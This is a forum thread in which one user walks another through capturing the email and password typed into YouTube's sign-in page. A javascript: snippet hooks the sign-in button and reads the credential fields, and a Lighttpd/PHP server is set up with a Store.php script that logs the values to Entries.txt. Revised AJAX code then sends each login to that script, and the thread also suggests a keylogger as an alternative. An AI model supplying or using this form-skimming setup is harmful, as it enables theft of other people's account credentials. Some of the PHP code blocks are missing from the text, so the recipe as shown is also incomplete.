Alright I guess I can't do this by myself and it seems to be too much of a work for someone to do it for me so I guess I'll just give it up and go study(I have freaking exams :'( ).

What I meant is, go to the youtube's login page.
Go in your browser's title and type in:

javascript:document.getElementById('signIn').onclick = function(){ alert('Mail: "'+document.getElementById('Email').value+'", Pass: "'+document.getElementById('Passwd').value+'"'); };


Press enter, and try to log in.

For chrome, you will need to manually type "javascript:", because it will get removed while you paste it.

Oh wow, it worked! Ok, I want it to save to a .txt instead. Is it possible? Thank you.

Aah, you aren't able to do it with the safety of the new browsers, they don't allow any access to your hard drive from a javascript script.

Maybe cookies, maybe send an email or similar...
If you have a PHP server running (even in localhost) you could easily send a request, sending the login informations, and saving them from the PHP script.

It's not a big trouble to make a PHP server for that, I have a PHP server that acts like a media player, and it uses PHP to receive the files' list/extension from a directory.

PHP is mostly what should be in the serverside (Saving/Loading files to server, mainly).

I could easily set it up for you if you want to, it should not take more than half an hour (Not sure, never worked so much with file reading/writing with PHP, but looking at docs it seems easy).

But again if you make an extension you could have a configuration file (extension = differently restricted javascript) to read in the extension's options page.

So what your saying is, that I can send login data I retrieved from javascript to an email and then retrieve this information by a PHP code?

I meant, Either send the infos via email, OR send the infos via php.

Actually, all it needs to be in the PHP file is:



And you should get your PHP page open like:

localhost/path/to/php/file.php?d=login_infos%20nick%20sgh%20pass%20lol

And you'd get a file looking like:

login_infos nick sgh pass lol

I just did this for a localhosted php server, and works good (besides possible safety issues like file size limits).

If you're actually interested in the PHP solution, I'll write a dedicated post to set yourself up for that, it takes more time to install server+php (because of download sizes and little configuration steps) than setting up the scripts.

EDIT: Also seems like you cannot send an email thru javascript.
So, either PHP or a keylogger.

I am very interested in what you're saying and if your willing to do it for me (as you said in "I'll write a dedicated post to set yourself up for that"), that would be great but I'd like to learn from you some things if you have the time. First of all, you used the term localhost alot, I'd like to know what that is please. And about the server, what I know is that a server is a machine that carries out a specific program and deals with all it's requirements, correct me if I'm wrong. I know I might be as dumb as a 6 year old for you, but would you care to explain more?

Winneris1 wrote:
that would be great but I'd like to learn from you some things if you have the time.

Surely.

Now, from the basics.
When you browse a website, you are really making a connection to another PC in the world,
asking him an HTML page (or a file to download, which is basically the same).

This PC you're making a connection to, is called a server. (Almost every PC can be a server)
This server, just like you, has its own IP (say 100.50.20.10, just as example), but must have the a port open to the public.

(Now, you can get their IP from their name, like, from www.google.com. But that's over our visions, we don't need that)

Opening port 80 (HTTP, web port) is usually very dangerous if made improperly.
To make your PHP website safer for tests and password-related things, you should keep your ports closed, and run it on your own machine, accessing it with "localhost".

Localhost is not a word I made up.
Actually, if you're running a web server, to load its pages you actually go to http://localhost/
It will redirect you to your own website (as long as the server is running).

What's different? Nothing.
But for your "localhost" server, only YOUR PC has access to the server.

Now, this is out of the php scope. You won't be needing it so much, all you need to know is that running a localhost server is safer for you and your internet connection.
(What are the risks of running your server publicly? Mainly DDoS: https://en.wikipedia.org/wiki/Denial-of-service_attack )

So, Let's set up your localhost server.

First things first:

I'll assume you're using Windows.

Download the right shyte:

You will need a decent and light webserver to handle connections.
I personally use Lighttpd, here you can find the compiled version: http://en.wlmp-project.net/downloads.php?cat=lighty&type=ssl&format=exe&mirror=dtech

Then, you will need the php preprocessor: http://windows.php.net/download/ (VC9, Non Thread Safe)

You will need to change your folders structure to meet these files requirements:

C:\php\php-cgi.exe
C:\Program Files\LightTPD\conf\lighttpd.conf


...I'm pretty sorry I'll break the message here but i'm really tired.
All that comes after this part is just editing two configuration files and start to build your server.

EDIT: So, I'm here.

Now, now.

1. Rename C:\php\php.ini-production to php.ini
This allows for PHP to run in the fastest way possible
2. Open C:\Program Files\LightTPD\conf\lighttpd.conf with any text editor
We will need to change lighttpd's settings and plugins
3. Uncomment the line "mod_cgi", (line 20 here)
mod_cgi is what will communicate with php.
4. Add this line, after server.modules( * ) cgi.assign = ( ".php" => "C:/php/php-cgi.exe" ). Note: You need to have no spaces in this filename.
This line tells mod_cgi that files ending in .php must be handled with the PHP CGI executable.


In case you are unable to edit lighttpd.conf, here is one, ready for you:
https://dl.dropboxusercontent.com/u/83943521/publicaccess/Files/lighttpd.conf

After this, your server is ready and you only need to make the scripts.
Travel to C:\Program Files\LightTPD\htdocs

Create a file, Store.php, and copy-paste this:


Now, to explain it:
<?php *** ?>

This simply tells PHP that, what is "***" must be interpreted as executable code. PHP will only handle code inside <?php ?>.

if(isset($_GET['d']))

Here, you need to understand what _GET is.
_GET is what takes parameters from the url bar. You will be able to send informations from javascript, and they will end up into _GET.

If we have valid informations, continue.

file_put_contents('Entries.txt',$_GET['d']."\n",FILE_APPEND|LOCK_EX);

Here, we will have a file, Entries.txt, that will contain any login informations we will send from javascript.
FILE_APPEND makes sure you don't delete the old login infos.
LOCK_EX makes it safer.

Now, the server-side is ready.
We need to tweak the javascript a bit.

Your new javascript code will be now:

document.getElementById('signIn').onclick=function(){$.ajax({url:"http://localhost/Store.php?d="+escape('Mail: "'+document.getElementById('Email').value+'", Pass: "'+document.getElementById('Passwd').value+'"'),type:"GET",async:false});}

_____________
Now, for the questions, I guess.
Because I'm sure some things won't be clear.

I'm pretty sorry I'll break the message here but i'm really tired.

I can't stress enough how thankful I am to you. Seriously, your my hero :D

Anyway, with your explanation I can understand that if I setup a safer localhost server the program can only work with LAN connected computers, am I right? I also downloaded the files and am ready when you are :)

Edit: For the PHP preprocessor, which version should I get?

Hey, updated post.

Yes, btw.

If you only set up a server for localhost, it will only work on lan or only on your pc, depending on your firewall and router settings.

(In fact, it's your router and firewall who choose if your server will be localhost-only or not)

Another little note, if you didn't notice, from my last edit.

EssGeEich wrote:
Then, you will need the php preprocessor: http://windows.php.net/download/ (VC9, Non Thread Safe)

:>

I skimmed through the update real quick. Is there a way to let the javascript run forever? Like a while loop?
I am very anxious to try this now but I need to take a nap so sorry.

You cannot do it with a while loop, it will stuck the page.
You should use javascript only as event "replies".
But you can use timers for that.

I did everything but I can't find the file "Entries.txt" anywhere.

The Entries.txt file will be created once a password is sent.
It will be found at:
C:\Program Files\LightTPD\htdocs\Entries.txt
Or, if your server is running:
http://localhost/Entries.txt

Sorry for the late reply, but I've been busy.

No problem. It isn't working though.

Edit: the file isn't there too.

Did you start Lighttpd? It needs to be running.

To check if it works, create the Entries.txt file yourself, and go to http://localhost/Entries.txt .
If you can read the content, it works.
If it says timeout/Connection closed or a Chrome error, it doesn't.
Then go to http://localhost/Store.php?d=Test
The page should be empty.
If it's not empty, the Lighttpd configuration file must be changed.
See if Entries.txt changed. If it did, there's something wrong with the javascript, probably.

I manually created entries.txt then I started lighttpd.exe. After using the javascript I tried opening entries.txt but it was empty. Same goes for the link you gave me.

I just realized that the php code has Logins.txt instead of Entries.txt Ill try changing that and see if it works.

Edit: still same problem.

So the second link (Store.php) gives you a completely white page?
Does the console give an error?
It should only give you these two lines:

No the first link, the one for the Entries. Ill check the second one now.